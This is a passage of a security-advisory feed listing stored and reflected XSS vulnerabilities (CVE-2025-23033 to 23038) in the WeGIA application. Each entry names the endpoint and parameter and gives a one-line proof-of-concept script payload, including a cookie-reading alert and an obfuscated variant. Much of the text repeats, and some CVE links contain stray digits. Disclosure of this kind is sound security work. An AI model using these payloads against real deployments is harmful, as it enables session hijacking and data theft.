scripts into the <code>situacao</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/adicionar_situacao.php</code></p><h2 id="cve-2025-23033-cross-site-scripting-xss-stored-endpoint-adicionar_situacaophp-parameter-situacao">CVE-2025-23033: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_situacao.php</code> parameter <code>situacao</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23033" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23033</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_situacao.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>situacao</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /dao/adicionar_situacao.php</code></p> <p>Parameter: <code>situacao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>adicionar_situacao.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">13</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-23033/402367326-633550cd-ebad-484e-b9b8-492def169793.png" width="819" height="341" srcset="/p/cve-2025-23033/402367326-633550cd-ebad-484e-b9b8-492def169793_hu_299abfdd04f1934.png 480w, /p/cve-2025-23033/402367326-633550cd-ebad-484e-b9b8-492def169793_hu_fd6e0c0927bcc7d1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="240" data-flex-basis="576px" /></p> <p><img src="/p/cve-2025-23033/402367327-2a10133e-66f8-4107-913d-9c3bfa369c94.png" width="807" height="171" srcset="/p/cve-2025-23033/402367327-2a10133e-66f8-4107-913d-9c3bfa369c94_hu_4d32d4b4f2da151a.png 480w, /p/cve-2025-23033/402367327-2a10133e-66f8-4107-913d-9c3bfa369c94_hu_71f40838a3a0f4be.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="471" data-flex-basis="1132px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-r8fq-hqr2-v5j9code" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-r8fq-hqr2-v5j9code</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-23034/ https://www.cvehunters.com/p/cve-2025-23034/ <h2 id="cve-2025-23034-cross-site-scripting-xss-reflected-endpoint-tagsphp-parameter-msg_e">CVE-2025-23034: Cross-Site Scripting (XSS) Reflected endpoint <code>tags.php</code> parameter <code>msg_e</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-230334" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-230334</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>tags.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_e</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/socio/sistema/tags.php</code></p> <p>Parameter: <code>msg_e</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_e</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p><h2 id="cve-2025-23034-cross-site-scripting-xss-reflected-endpoint-tagsphp-parameter-msg_e">CVE-2025-23034: Cross-Site Scripting (XSS) Reflected endpoint <code>tags.php</code> parameter <code>msg_e</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-230334" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-230334</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>tags.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_e</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/socio/sistema/tags.php</code></p> <p>Parameter: <code>msg_e</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_e</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-23034/402369982-df172b29-9fe6-4393-ada8-db6f41182d39.png" width="804" height="221" srcset="/p/cve-2025-23034/402369982-df172b29-9fe6-4393-ada8-db6f41182d39_hu_6ca3bfaac8361e0f.png 480w, /p/cve-2025-23034/402369982-df172b29-9fe6-4393-ada8-db6f41182d39_hu_82ba27ad6ee90b18.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="363" data-flex-basis="873px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> Reflected cross-site scripting (XSS) attacks can have serious consequences, including: <ul> <li>User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.</li> <li>Data theft: Attackers can exfiltrate data or install malware on the user's machine.</li> <li>Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.</li> <li>Malicious code: Attackers can execute malicious code on the user's system.</li> <li>Business reputation damage: Attackers can deface a corporate website or spread misinformation.</li> <li>Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v68m-2rvf-8r25" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-v68m-2rvf-8r25</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p>*By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a>*code</p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-23035/ https://www.cvehunters.com/p/cve-2025-23035/ <h2 id="cve-2025-23035-cross-site-scripting-xss-stored-endpoint-adicionar_tipo_quadro_horariophp-parameter-tipo">CVE-2025-23035: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_tipo_quadro_horario.php</code> parameter <code>tipo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23035" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23035</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_tipo_quadro_horario.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/quadro_horario/adicionar_tipo_quadro_horario.php</code></p><h2 id="cve-2025-23035-cross-site-scripting-xss-stored-endpoint-adicionar_tipo_quadro_horariophp-parameter-tipo">CVE-2025-23035: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_tipo_quadro_horario.php</code> parameter <code>tipo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23035" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23035</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_tipo_quadro_horario.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/quadro_horario/adicionar_tipo_quadro_horario.php</code></p> <p>Parameter: <code>tipo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>adicionar_tipo_quadro_horario.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">top</span><span class="p">[</span><span class="mf">8680439.</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">30</span><span class="p">)](</span><span class="mi">1337</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-23035/402371640-1d88d334-67da-4a9b-9ca0-31c2b92b6dfb.png" width="806" height="225" srcset="/p/cve-2025-23035/402371640-1d88d334-67da-4a9b-9ca0-31c2b92b6dfb_hu_96dcde3cebe73f11.png 480w, /p/cve-2025-23035/402371640-1d88d334-67da-4a9b-9ca0-31c2b92b6dfb_hu_44063c080014bc74.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="358" data-flex-basis="859px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qfmh-qrr2-5c4g" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-qfmh-qrr2-5c4g</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-23036/ https://www.cvehunters.com/p/cve-2025-23036/ <h2 id="cve-2025-23036-cross-site-scripting-xss-reflected-endpoint-pre_cadastro_funcionariophp-parameter-msg_e">CVE-2025-23036: Cross-Site Scripting (XSS) Reflected endpoint <code>pre_cadastro_funcionario.php</code> parameter <code>msg_e</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-230336" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-230336</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>pre_cadastro_funcionario.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_e</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/funcionario/pre_cadastro_funcionario.php</code></p> <p>Parameter: <code>msg_e</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_e</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p><h2 id="cve-2025-23036-cross-site-scripting-xss-reflected-endpoint-pre_cadastro_funcionariophp-parameter-msg_e">CVE-2025-23036: Cross-Site Scripting (XSS) Reflected endpoint <code>pre_cadastro_funcionario.php</code> parameter <code>msg_e</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-230336" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-230336</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>pre_cadastro_funcionario.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the <code>msg_e</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>GET /html/funcionario/pre_cadastro_funcionario.php</code></p> <p>Parameter: <code>msg_e</code></p> <p style="text-align: justify;">The application fails to validate and sanitize user inputs in the <code>msg_e</code> parameter. This lack of validation permits the injection of malicious payloads, which are reflected back to the user's browser in the server's response and executed within the context of the victim's browser.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="err">"</span><span class="o">><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-23036/402374072-65222dc8-7ff7-4a1f-973c-023270034023.png" width="799" height="229" srcset="/p/cve-2025-23036/402374072-65222dc8-7ff7-4a1f-973c-023270034023_hu_615255467e8a70fc.png 480w, /p/cve-2025-23036/402374072-65222dc8-7ff7-4a1f-973c-023270034023_hu_605df0bed62e324e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="348" data-flex-basis="837px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> Reflected cross-site scripting (XSS) attacks can have serious consequences, including: <ul> <li>User actions: Attackers can perform any action the user can, such as viewing, modifying, or initiating interactions with other users.</li> <li>Data theft: Attackers can exfiltrate data or install malware on the user's machine.</li> <li>Account compromise: Attackers can manipulate or steal cookies, or compromise confidential information.</li> <li>Malicious code: Attackers can execute malicious code on the user's system.</li> <li>Business reputation damage: Attackers can deface a corporate website or spread misinformation.</li> <li>Misdirection: Attackers can change the instructions given to users, which can be dangerous if the target is a government website or provides vital resources.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-2vpg-j5jh-j22x" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-2vpg-j5jh-j22x</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-23037/ https://www.cvehunters.com/p/cve-2025-23037/ <h2 id="cve-2025-23037-cross-site-scripting-xss-stored-endpoint-controlphp-parameter-cargo">CVE-2025-23037: Cross-Site Scripting (XSS) Stored endpoint <code>control.php</code> parameter <code>cargo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-230337" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-230337</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>control.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>cargo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /controle/control.php</code></p><h2 id="cve-2025-23037-cross-site-scripting-xss-stored-endpoint-controlphp-parameter-cargo">CVE-2025-23037: Cross-Site Scripting (XSS) Stored endpoint <code>control.php</code> parameter <code>cargo</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-230337" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-230337</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>control.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>cargo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /controle/control.php</code></p> <p>Parameter: <code>cargo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>control.php</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">POC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-23037/402376149-6493793e-324f-4905-bfe1-f3b4ee2c2f85.png" width="805" height="327" srcset="/p/cve-2025-23037/402376149-6493793e-324f-4905-bfe1-f3b4ee2c2f85_hu_328ff5c457ca5e7d.png 480w, /p/cve-2025-23037/402376149-6493793e-324f-4905-bfe1-f3b4ee2c2f85_hu_6f47a1fbd76daf7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="246" data-flex-basis="590px" /></p> <p><img src="/p/cve-2025-23037/402376150-56dab48e-5331-4b98-9d04-ff0d7a4d8ab3.png" width="807" height="155" srcset="/p/cve-2025-23037/402376150-56dab48e-5331-4b98-9d04-ff0d7a4d8ab3_hu_ab0ea3f50ed6054b.png 480w, /p/cve-2025-23037/402376150-56dab48e-5331-4b98-9d04-ff0d7a4d8ab3_hu_aec198605a17294a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="520" data-flex-basis="1249px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rjjp-w2wm-7f9j" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rjjp-w2wm-7f9j</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="contributors">Contributors </h2><p><a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/angelo50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/angelo-morette-019/" target="_blank" rel="noopener" >Angelo Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 13 Jan 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-23038/ https://www.cvehunters.com/p/cve-2025-23038/ <h2 id="cve-2025-23038-cross-site-scripting-xss-stored-endpoint-remuneracaophp-parameter-descricao">CVE-2025-23038: Cross-Site Scripting (XSS) Stored endpoint <code>remuneracao.php</code> parameter <code>descricao</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-23038" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-23038</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>remuneracao.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>descricao</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>POST /html/funcionario/remuneracao.php</code></p><h2 id="cve-2025-23038-cross-site-scripting-xss-stored-endpoint-remuneracaophp-parameter-descricao">CVE-2025-23038: Cross-Site Scripting (XSS) Stored endpoint <code>remuneracao.php</code> parameter <code>descricao</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" 